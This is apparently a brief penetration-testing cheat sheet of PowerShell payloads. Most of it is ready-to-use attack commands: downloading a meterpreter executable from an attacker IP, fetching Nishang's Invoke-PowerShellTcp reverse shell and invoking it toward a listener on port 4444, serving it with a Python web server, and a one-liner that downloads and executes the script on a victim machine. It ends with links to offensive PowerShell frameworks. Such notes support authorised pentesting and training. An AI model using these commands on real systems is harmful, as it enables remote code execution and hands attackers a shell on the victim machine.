Powershell Payloads

Reverse shells and enumeration scripts

cURL

$URL="http://10.9.254.6/meterpreter.exe"
$Path="C:\Users\pentest\meterpreter.exe"

Invoke-WebRequest -URI $URL -OutFile $Path

Reverse Shell

curl https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 > rev.ps1

Add the following line at the end of the script to invoke the function, adjusting args...

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Start a web server

python3 -m http.server

Download and exectute the powershell script from attacker web server (on victim machine)

 powershell.exe (IEX(IWR http://10.10.14.5:8000/rev.ps1 -UseBasicParsing))

Projects

HackTricks

Basic PowerShell for PentestersHackTricks

Nishang

Framework and collection of payloads for offensive security and pentesting

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Powersploit

Project is no longer supported

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation FrameworkGitHub